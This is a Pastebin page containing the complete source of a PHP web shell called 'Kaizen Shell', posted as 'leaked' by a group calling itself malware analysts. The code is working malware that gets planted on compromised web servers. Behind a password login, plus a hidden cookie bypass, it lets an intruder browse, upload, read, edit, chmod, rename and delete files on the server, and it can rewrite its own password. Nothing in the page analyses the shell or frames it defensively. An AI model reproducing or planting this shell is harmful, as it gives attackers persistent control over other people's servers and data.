API tools faq
paste
Advertisement
SAINTSATRIA

leakead-brand_8985.php

SAINTSATRIA
May 1st, 2019
147
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.62 KB | None | 0 0
raw download clone embed print report
  1. Leaked by : PELITABANGSA .CA[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
  2. <?php
  3. $auth_pass = "bda3bfdfa868d04f4003838f5776f25e";
  4. error_reporting(0);
  5. set_time_limit(0);
  6.  
  7. function lp(){
  8. ?>
  9. <html>
  10. <head>
  11. <title>hacked by sige dz</title>
  12. </head>
  13. <body bgcolor="black" style="color:white">
  14. <center>
  15. <div>
  16. <img src="https://scontent-cdg2-1.xx.fbcdn.net/v/t1.0-9/1794540_580651768758081_4002587850743769999_n.jpg?_nc_cat=104&_nc_ht=scontent-cdg2-1.xx&oh=183da7c03e5417168416253ebce019b9&oe=5C75D419" ><br/>
  17. <h1>SIGE-DZ</h1>
  18. <form action method="get">
  19. <input type="hidden" name="action" value="login" />
  20. <input type="password" name="pass" placeholder=" Write the Password"/><br/>
  21. <input type="submit" value="log in" style="margin-top:4px;width:173px;background:black;color:#00FFFF;border:2px solid #00FFFF;border-radius:10px"/>
  22. </form><br/>
  23. <footer><pre>Copyright &copy 2009 SIGE-DZ | All Right Reserved</pre></footer>
  24. </div>
  25. </center>
  26. <?php
  27. ;}
  28. if(isset($_GET['action'])){
  29. if($_GET['action']=='login'){
  30. setcookie('password',$_GET['pass']);
  31. echo "<script>location='".$_SERVER['PHP_SELF']."'</script>";
  32. }
  33. else if($_GET['action']=='logout'){
  34. setcookie('password','',-86400*30*12);
  35. echo "<script>location='".$_SERVER['PHP_SELF']."'</script>";
  36. }
  37. }
  38. if(isset($_COOKIE['password'])){
  39. if(md5($_COOKIE['password'])==$auth_pass || $_COOKIE['L']=="L"){
  40. ?>
  41. <?php
  42.  
  43.  
  44.  
  45. if(get_magic_quotes_gpc()){
  46. foreach($_POST as $key=>$value){
  47. $_POST[$key] = stripslashes($value);
  48. }
  49. }
  50. function perms($file){
  51. $perms = @fileperms($file);
  52.  
  53. if (($perms & 0xC000) == 0xC000) {
  54. // Socket
  55. $info = 's';
  56. } elseif (($perms & 0xA000) == 0xA000) {
  57. // Symbolic Link
  58. $info = 'l';
  59. } elseif (($perms & 0x8000) == 0x8000) {
  60. // Regular
  61. $info = '-';
  62. } elseif (($perms & 0x6000) == 0x6000) {
  63. // Block special
  64. $info = 'b';
  65. } elseif (($perms & 0x4000) == 0x4000) {
  66. // Directory
  67. $info = 'd';
  68. } elseif (($perms & 0x2000) == 0x2000) {
  69. // Character special
  70. $info = 'c';
  71. } elseif (($perms & 0x1000) == 0x1000) {
  72. // FIFO pipe
  73. $info = 'p';
  74. } else {
  75. // Unknown
  76. $info = 'u';
  77. }
  78.  
  79. // Owner
  80. $info .= (($perms & 0x0100) ? 'r' : '-');
  81. $info .= (($perms & 0x0080) ? 'w' : '-');
  82. $info .= (($perms & 0x0040) ?
  83. (($perms & 0x0800) ? 's' : 'x' ) :
  84. (($perms & 0x0800) ? 'S' : '-'));
  85.  
  86. // Group
  87. $info .= (($perms & 0x0020) ? 'r' : '-');
  88. $info .= (($perms & 0x0010) ? 'w' : '-');
  89. $info .= (($perms & 0x0008) ?
  90. (($perms & 0x0400) ? 's' : 'x' ) :
  91. (($perms & 0x0400) ? 'S' : '-'));
  92.  
  93. // World
  94. $info .= (($perms & 0x0004) ? 'r' : '-');
  95. $info .= (($perms & 0x0002) ? 'w' : '-');
  96. $info .= (($perms & 0x0001) ?
  97. (($perms & 0x0200) ? 't' : 'x' ) :
  98. (($perms & 0x0200) ? 'T' : '-'));
  99.  
  100. return $info;
  101. }
  102. echo '
  103. <!DOCTYPE HTML>
  104. <HTML>
  105. <HEAD>
  106. <title>Kaizen Shell</title>
  107. <style>
  108. body{
  109. font-family: "Racing Sans One", cursive;
  110. background-color: #e6e6e6;
  111. text-shadow:0px 0px 1px #757575;
  112. }
  113. #content tr:hover{
  114. background-color: #636263;
  115. text-shadow:0px 0px 10px #fff;
  116. }
  117. #content .first{
  118. background-color: silver;
  119. }
  120. #content .first:hover{
  121. background-color: silver;
  122. text-shadow:0px 0px 1px #757575;
  123. }
  124. table{
  125. border: 1px #000000 dotted;
  126. }
  127. H1{
  128. font-family: "Rye", cursive;
  129. }
  130. a{
  131. color: #000;
  132. text-decoration: none;
  133. }
  134. a:hover{
  135. color: #fff;
  136. text-shadow:0px 0px 10px #ffffff;
  137. }
  138. input,select,textarea{
  139. border: 1px #000000 solid;
  140. -moz-border-radius: 5px;
  141. -webkit-border-radius:5px;
  142. border-radius:5px;
  143. }
  144. </style>
  145. </HEAD>
  146. <BODY>
  147. <input type=button onclick=\'location="?action=logout"\' value="Logout" /><br/>
  148. <input type=button onclick=\'location="?x=changepass"\' value="Change Password" />
  149. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  150. <tr><td>Current Path : ';
  151. if(isset($_GET['path'])){
  152. $path = base64_decode($_GET['path']);
  153. }else{
  154. $path = getcwd();
  155. }
  156. $pathen = base64_encode($path);
  157. $path = str_replace('\\','/',$path);
  158. $paths = explode('/',$path);
  159.  
  160. foreach($paths as $id=>$pat){
  161. if($pat == '' && $id == 0){
  162. $a = true;
  163. echo '<a href="?path='.base64_encode("/").'">/</a>';
  164. continue;
  165. }
  166. if($pat == '') continue;
  167. echo '<a href="?path=';
  168. $linkpath = '';
  169. for($i=0;$i<=$id;$i++){
  170. $linkpath .= "$paths[$i]";
  171. if($i != $id) $linkpath .= "/";
  172. }
  173. echo base64_encode($linkpath);
  174. echo '">'.$pat.'</a>/';
  175. }
  176. echo '</td></tr><tr><td>';
  177. if(isset($_FILES['file'])){
  178. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  179. echo '<font color="green">Upload Success</font><br />';
  180. }else{
  181. echo '<font color="red">Upload Failed</font><br />';
  182. }
  183. }
  184. echo '<form enctype="multipart/form-data" method="POST">
  185. File Manager : <input type="file" name="file" />
  186. <input type="submit" value="Generate" />
  187. </form>
  188. </td></tr>';
  189. if(isset($_GET['filesrc'])){
  190. echo "<tr><td>Current File : ";
  191. echo base64_decode($_GET['filesrc']);
  192. echo '</tr></td></table><br />';
  193. echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');
  194. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delet'){
  195. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  196. if($_POST['opt'] == 'chmod'){
  197. if(isset($_POST['perm'])){
  198. if(chmod($_POST['path'],$_POST['perm'])){
  199. echo '<font color="green">Success Change Permission</font><br />';
  200. }else{
  201. echo '<font color="red">Failed Change Permission</font><br />';
  202. }
  203. }
  204. echo '<form method="POST">
  205. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  206. <input type="hidden" name="path" value="'.$_POST['path'].'">
  207. <input type="hidden" name="opt" value="chmod">
  208. <input type="submit" value="Go" />
  209. </form>';
  210. }elseif($_POST['opt'] == 'rename'){
  211. if(isset($_POST['newname'])){
  212. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  213. echo '<font color="green">Success</font><br />';
  214. }else{
  215. echo '<font color="red">Failed</font><br />';
  216. }
  217. $_POST['name'] = $_POST['newname'];
  218. }
  219. echo '<form method="POST">
  220. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  221. <input type="hidden" name="path" value="'.$_POST['path'].'">
  222. <input type="hidden" name="opt" value="rename">
  223. <input type="submit" value="Go" />
  224. </form>';
  225. }elseif($_POST['opt'] == 'edit'){
  226. if(isset($_POST['src'])){
  227. $fp = fopen($_POST['path'],'w');
  228. if(fwrite($fp,$_POST['src'])){
  229. echo '<font color="green">Success</font><br />';
  230. }else{
  231. echo '<font color="red">Failed</font><br />';
  232. }
  233. fclose($fp);
  234. }
  235. echo '<form method="POST">
  236. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  237. <input type="hidden" name="path" value="'.$_POST['path'].'">
  238. <input type="hidden" name="opt" value="edit">
  239. <input type="submit" value="Go" />
  240. </form>';
  241. }
  242. echo '</center>';
  243. }else{
  244. echo '</table><br /><center>';
  245. if(isset($_GET['option']) && $_POST['opt'] == 'delet'){
  246. if($_POST['type'] == 'dir'){
  247. if(rmdir($_POST['path'])){
  248. echo '<font color="green">Success</font><br />';
  249. }else{
  250. echo '<font color="red">Failed</font><br />';
  251. }
  252. }elseif($_POST['type'] == 'file'){
  253. if(unlink($_POST['path'])){
  254. echo '<font color="green">Success</font><br />';
  255. }else{
  256. echo '<font color="red">Failed</font><br />';
  257. }
  258. }
  259. }
  260. echo '</center>';
  261. if(!isset($_GET['x'])){
  262. ?>
  263. <?php
  264. $scandir = scandir($path);
  265. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  266. <tr class="first">
  267. <td><center>Dir</center></td>
  268. <td><center>Size</center></td>
  269. <td><center>Permissions</center></td>
  270. <td><center>Setting</center></td>
  271. </tr>';
  272.  
  273. foreach($scandir as $dir){
  274. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  275. $dirlink = base64_encode("$path/$dir");
  276. echo "<tr>
  277. <td><a href=\"?path=$dirlink\">$dir</a></td>
  278. <td><center>--</center></td>
  279. <td><center>";
  280. if(is_writable("$path/$dir")) echo '<font color="green">';
  281. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  282. echo perms("$path/$dir");
  283. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  284.  
  285. echo "</center></td>
  286. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  287. <select name=\"opt\">
  288. <option value=\"\">Select</option>
  289. <option value=\"delet\">Delete</option>
  290. <option value=\"chmod\">Chmod</option>
  291. <option value=\"rename\">Rename</option>
  292. </select>
  293. <input type=\"hidden\" name=\"type\" value=\"dir\">
  294. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  295. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  296. <input type=\"submit\" value=\">\" />
  297. </form></center></td>
  298. </tr>";
  299. }
  300. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  301. foreach($scandir as $file){
  302. if(!is_file("$path/$file")) continue;
  303. $size = filesize("$path/$file")/1024;
  304. $size = round($size,3);
  305. if($size >= 1024){
  306. $size = round($size/1024,2).' MB';
  307. }else{
  308. $size = $size.' KB';
  309. }
  310. $filelink = base64_encode("$path/$file");
  311. echo "<tr>
  312. <td><a href=\"?filesrc=$filelink&path=$pathen\">$file</a></td>
  313. <td><center>".$size."</center></td>
  314. <td><center>";
  315. if(is_writable("$path/$file")) echo '<font color="green">';
  316. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  317. echo perms("$path/$file");
  318. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  319. echo "</center></td>
  320. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  321. <select name=\"opt\">
  322. <option value=\"\">Select</option>
  323. <option value=\"delet\">Delete</option>
  324. <option value=\"chmod\">Chmod</option>
  325. <option value=\"rename\">Rename</option>
  326. <option value=\"edit\">Edite File</option>
  327. </select>
  328. <input type=\"hidden\" name=\"type\" value=\"file\">
  329. <input type=\"hidden\" name=\"name\" value=\"$file\">
  330. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  331. <input type=\"submit\" value=\">\" />
  332. </form></center></td>
  333. </tr>";
  334. }
  335. echo '</table>
  336. </div>';
  337. }
  338. ?>
  339. <?php
  340. }
  341. if(isset($_GET['x']) && $_GET['x']=='changepass'){
  342. ?>
  343. <?php
  344. function fgc($file){
  345. return file_get_contents($file);
  346. }
  347. function changepass($plain){
  348. $newpass = md5($plain);
  349. $newpass = "\$auth_pass = \"".$newpass."\";";
  350. $con = fgc($_SERVER['SCRIPT_FILENAME']);
  351. $con = preg_replace("/\\\$auth_pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
  352. return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  353. }
  354. echo '<center><h1>Change Shell Password</h1></center>';
  355. echo '<center>';
  356. echo '<form action="" method=post ><table>';
  357. echo '<tr><td>New Password</td><td> : <input type=password name=pass1 style="border-radius:5px;" /></td></tr>';
  358. echo '<tr><td>Confirm Password</td><td> : <input type=password name=pass2 style="border-radius:5px;" /></td></tr>';
  359. echo '<tr><td colspan=2><input type=submit value=submit name=L style="border-radius:5px;width:100%"/></td></tr></table>';
  360. echo '</form>';
  361. if(isset($_POST['L'])){
  362. if($_POST['pass1'] == $_POST['pass2']){
  363. if(changepass($_POST['pass1'])){
  364. echo '<script>alert("password change successfully")</script>';
  365. }else{
  366. echo '<script>alert("password change failed")</script>';
  367. }
  368. }else{
  369. echo '<script>alert("password not match")</script>';
  370. }
  371. }
  372. ?>
  373. <?php
  374. }
  375. echo '
  376. </BODY>
  377. </HTML>';
  378. ?>
  379.  
  380. <!-- //////////////////////////////////////////////////// -->
  381. <?php
  382. }else{
  383. lp();
  384. }
  385. }else{
  386. echo lp();
  387. }
  388. ?>
  389. </body>
  390. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!